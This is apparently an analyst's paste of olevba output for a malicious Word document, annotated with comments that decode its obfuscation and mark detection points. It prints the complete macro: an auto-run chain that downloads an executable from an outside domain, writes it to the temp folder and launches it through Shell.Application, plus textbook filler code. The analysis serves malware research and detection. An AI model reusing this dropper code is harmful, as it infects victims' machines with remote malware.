dynamoo

Malicious Word macro

Jul 6th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- elle01~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: elle01~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: elle01~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
' Entry point. AutoOpen runs automatically when the document is opened in
' Word (olevba flags it as AutoExec in the table below). It only forwards to
' the next hop in the chain; the constant 700 is never read by the callee.
Sub autoopen()

Nip121ÖÊÂ3017 (700)

End Sub
  21.  
' Second hop of the call chain autoopen -> this Sub -> baV5XhIz81 (Module2).
' FFFFF is never referenced in the body; the extra indirection just keeps the
' AutoOpen procedure free of anything olevba would score as suspicious.
Sub Nip121ÖÊÂ3017(FFFFF As Integer)

baV5XhIz81

End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Module-level string shared across modules: baV5XhIz81 (Module2) stores the
' path of the dropped file here and P4mfk1w0 later passes it to
' Shell.Application.Open.
Public X480smtBX7GP As String
  41.  
  42.  
  43.  
  44. ' Listing 15.1. Using Automation to create a new Word document.
  45. '
  46.  
  47.  
  48.  
' Launches the dropped file. The Chr() chain decodes to "Shell.Application";
' calling .Open on the path held in X480smtBX7GP executes whatever
' baV5XhIz81 saved there. The hFiXhEUGKyuh5 argument is unused and the
' Function never assigns a return value. Only reached from the error handler
' in baV5XhIz81.
Public Function P4mfk1w0(hFiXhEUGKyuh5 As String)
 ' "Shell.Application"
 Set UORXlUXJ8 = WEydCTxsxt4(Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l" & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & "t" & Chr(105) & Chr(111) & Chr(110))
' Detection point: Shell.Application.Open on a path under %TEMP%.
UORXlUXJ8.Open (X480smtBX7GP)
End Function
' Not referenced by any other procedure in this dump. The "Listing 15.1"
' comment above and the tutorial-style strings suggest this is filler pasted
' from a VBA textbook to pad the module with benign-looking code.
' HCnjkdbhve is never declared (it looks like the tutorial's `Application`
' object was renamed), so the StatusBar assignment would most likely raise a
' runtime error if this Sub were ever called — TODO confirm.
Sub CreateWordDocument()
    Dim wordApp As Word.Application
    '
   ' Create the Word Application object
   '
   HCnjkdbhve.Application.StatusBar = "Creating Word Application object..."
    Set wordApp = CreateObject("Word.Application")
    '
   ' Work with Word's Application object directly
   '
   With wordApp
        '
       ' Create a new document and add some text
       '
       HCnjkdbhve.Application.StatusBar = "Creating new Word document..."
        .Documents.Add
        .ActiveDocument.Paragraphs(1).Range.InsertBefore "This is an Automation test."
        '
       ' Save the document
       '
       HCnjkdbhve.Application.StatusBar = "Saving Word document..."
        .ActiveDocument.SaveAs "C:\My Documents\OLETest.doc"
        '
       ' We're done, so quit Word
       '
       HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
        .Quit
    End With
    Set wordApp = Nothing
    HCnjkdbhve.Application.StatusBar = False
End Sub
  84.  
  85. ' Listing 15.2. Using Automation to work with a Word document.
  86. '
' Thin wrapper around CreateObject that returns the object for the ProgID
' passed in. Every COM object in this macro (Shell.Application, Adodb.Stream,
' Microsoft.XMLHTTP, WScript.Shell) is created through it with a
' Chr()-assembled name, so none of those ProgIDs appear as plain strings.
Public Function WEydCTxsxt4(ofuVzwV8M As String)
 Set WEydCTxsxt4 = CreateObject(ofuVzwV8M)
End Function
' Filler from the same VBA textbook as CreateWordDocument ("Listing 15.2");
' not referenced by any other procedure in this dump. Note the mangled
' `wordDoc.HCnjkdbhve.Application.Quit` near the end, where the tutorial's
' `Application` was renamed — the Sub would not run cleanly even if called.
Sub DocumentWordCount()
    Dim wordDoc As Word.Document
    '
   ' Get the Word Document object
   '
   HCnjkdbhve.Application.StatusBar = "Getting Word Document object..."
    Set wordDoc = GetObject("C:\My Documents\OLETest.doc", "Word.Document")
    '
   ' Get the word count
   '
   HCnjkdbhve.Application.StatusBar = "Getting word count..."
    MsgBox wordDoc.Name & " has " & wordDoc.Words.Count & " words."
    '
   ' We're done, so quit Word and release object variable
   '
   HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
    wordDoc.HCnjkdbhve.Application.Quit
    Set wordDoc = Nothing
    HCnjkdbhve.Application.StatusBar = False
End Sub
  110.  
' Writes a byte buffer to disk. rCKhzY8Z5 is the data (baV5XhIz81 passes the
' HTTP responseBody) and YVPfKl3km the destination path (the %TEMP% drop
' path). The Chr() chain decodes to "Adodb.Stream"; .Type = 1 is
' adTypeBinary and the second SaveToFile argument 2 is adSaveCreateOverWrite,
' so an existing file at that path is silently replaced. No return value is
' assigned. Detection point: ADODB.Stream SaveToFile from a Word macro.
Public Function S5keRrVDgCuXr(rCKhzY8Z5 As Variant, YVPfKl3km As String)
Dim x0YC6QLt: Set x0YC6QLt = WEydCTxsxt4(Chr(65) & Chr(100) & "o" & Chr(100) & Chr(98) & "." & "S" & Chr(116) & "r" & Chr(101) & "a" & "m")

With x0YC6QLt
   .Type = 1
    .Open
    .write rCKhzY8Z5
    .savetofile YVPfKl3km, 2
End With
End Function
  121. ' Listing 15.3. Using Automation to run a PowerPoint
  122. ' presentation slide show.
  123. '
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125. ANALYSIS:
  126. +------------+--------------+-----------------------------------------+
  127. | Type       | Keyword      | Description                             |
  128. +------------+--------------+-----------------------------------------+
  129. | Suspicious | Open         | May open a file                         |
  130. | Suspicious | Chr          | May attempt to obfuscate specific       |
  131. |            |              | strings                                 |
  132. | Suspicious | CreateObject | May create an OLE object                |
  133. | Suspicious | SaveToFile   | May create a text file                  |
  134. | Suspicious | Run          | May run an executable file or a system  |
  135. |            |              | command                                 |
  136. | Suspicious | Write        | May write to a file (if combined with   |
  137. |            |              | Open)                                   |
  138. +------------+--------------+-----------------------------------------+
  139. -------------------------------------------------------------------------------
  140. VBA MACRO Module2.bas
  141. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module2'
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Filler ("Listing 16.x" series). Not referenced by any other procedure in
' this dump, and it uses the Excel objects ThisWorkbook/Worksheets inside a
' Word document, so it is unlikely to be functional here.
Sub GatherBudgetSheets()
    Dim myCollection As New Collection
   ' Dim ws As Worksheet

    For Each ws In ThisWorkbook.Worksheets
        If InStr(ws.Name, "Budget") Then
            myCollection.Add Item:=ws, Key:=ws.Name
        End If
    Next 'ws
   MsgBox "The custom collection contains " & _
        myCollection.Count & " worksheets."
End Sub
  155.  
  156. ' Listing 16.2. A procedure that clears all objects
  157.  
  158. ' from a custom collection.
  159. '
' Filler ("Listing 16.2"): empties a Collection one item at a time. Not
' referenced by any other procedure in this dump.
Sub ClearCollection(coll As Collection)
    Do While coll.Count > 0
        coll.Remove Index:=1
    Loop
End Sub
  165.  
  166. ' Listing 16.3. Using an object in a custom class.
  167.  
' Main payload, reached via autoopen -> Nip121ÖÊÂ3017. Downloads an executable
' over HTTP, writes it under %TEMP%, then launches it from an error handler.
' The decoded values in the comments below come from evaluating the Chr()
' chains visible in this dump.
Sub baV5XhIz81()

' Decodes to "Microsoft.XMLHTTP" — the download client.
Set qKUOnuHCDX = WEydCTxsxt4("M" & Chr(105) & "c" & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))


' Decodes to "http:/</ozelduzensurucukursu.com/253/632.exe"; the stray "<"
' is removed on the next line, leaving the download URL
' hxxp://ozelduzensurucukursu[.]com/253/632.exe (network IoC, defanged here).
Hcwvewv = Chr(104) & Chr(116) & "t" & Chr(112) & ":" & Chr(47) & Chr(60) & Chr(47) & Chr(111) & Chr(122) & Chr(101) & Chr(108) & Chr(100) & Chr(117) & Chr(122) & Chr(101) & Chr(110) & Chr(115) & Chr(117) & "r" & Chr(117) & Chr(99) & Chr(117) & Chr(107) & Chr(117) & Chr(114) & "s" & Chr(117) & Chr(46) & Chr(99) & Chr(111) & "m" & Chr(47) & "2" & Chr(53) & "3" & Chr(47) & Chr(54) & "3" & Chr(50) & Chr(46) & "e" & Chr(120) & "e"
Hcwvewv = Replace(Hcwvewv, Chr(60), "", 1, 1, vbTextCompare)
' CallByName hides the method name from keyword scans: this is
' .Open "GET", url, False (False = synchronous request).
CallByName qKUOnuHCDX, Chr(79) & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & "E" & "T" _
, Hcwvewv _
, _
False

' Decodes to "WScript.Shell"; used only to read the process environment.
Set WigQ9SJdY = WEydCTxsxt4("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))

' .Environment("Process") via CallByName.
Set QI4SQ0ILWyLNH = CallByName(WigQ9SJdY, Chr(69) & "n" & Chr(118) & "i" & Chr(114) & "o" & Chr(110) & "m" & "e" & "n" & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))

' Reads the TEMP variable of the current process.
roCrTtTn4bavbJ = QI4SQ0ILWyLNH(Chr(84) & Chr(69) & Chr(77) & Chr(80))

' Drop path: %TEMP%\blogdynamoocom.exe (host IoC). Stored in the Module1
' global X480smtBX7GP so P4mfk1w0 can launch it later.
X480smtBX7GP = roCrTtTn4bavbJ & "\" & Chr(98) & Chr(108) & "o" & Chr(103) & Chr(100) & Chr(121) & Chr(110) & Chr(97) & Chr(109) & "o" & Chr(111) & Chr(99) & "o" & Chr(109) & "." & "e" & "x" & Chr(101)
Dim NGWFp3rv8t() As Byte

' .Send, then .responseBody — the raw bytes of the downloaded file.
CallByName qKUOnuHCDX, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
NGWFp3rv8t = CallByName(qKUOnuHCDX, "r" & Chr(101) & "s" & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & "d" & "y", VbGet)
' Write the bytes to the drop path through ADODB.Stream (Module1).
S5keRrVDgCuXr NGWFp3rv8t, X480smtBX7GP
' Deliberate divide-by-zero: control never reaches HHdhh.Hnjkvowve. The
' error handler JlQwk75hS is the real execution path — it calls P4mfk1w0,
' which runs the dropped file via Shell.Application.Open. Presumably the
' handler is used as the call site so the launch is not in the straight-line
' code a reader or a simple emulator follows; the download -> SaveToFile ->
' Shell.Application.Open sequence is the behaviour to detect on.
On Error GoTo JlQwk75hS
    a = 356 / 0
    HHdhh.Hnjkvowve
  On Error GoTo 0

mE6JTzsE:
  Exit Sub
JlQwk75hS:
  ' P4mfk1w0 ignores its string argument.
  P4mfk1w0 ("VAJ7EpH77R5Tf")
Resume mE6JTzsE
End Sub
  203.  
  204.  
  205. '
' Filler ("Listing 16.3"). Not referenced by any other procedure in this dump;
' the Dim for newCustomer is commented out, so the With blocks operate on an
' undeclared name and the Sub would not run cleanly even if called.
Sub CustomClassObjectTest()
    'Dim newCustomer As New CCustomer
   With newCustomer
        .Account = "12-3456"
        .Name = "ACME Coyote Supplies"
        .Address = "123 Wily Way"
        'Set .Invoices = New CInvoices
   End With
    With newCustomer.Invoices
        .Add CustAcct:=newCustomer.Account, Amt:=1234.56
        .Add CustAcct:=newCustomer.Account, Amt:=432.1
        MsgBox .Count
    End With
End Sub
  220.  
  221. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  222. ANALYSIS:
  223. +------------+------------+-----------------------------------------+
  224. | Type       | Keyword    | Description                             |
  225. +------------+------------+-----------------------------------------+
  226. | Suspicious | Chr        | May attempt to obfuscate specific       |
  227. |            |            | strings                                 |
  228. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  229. |            |            | function calls                          |
  230. +------------+------------+-----------------------------------------+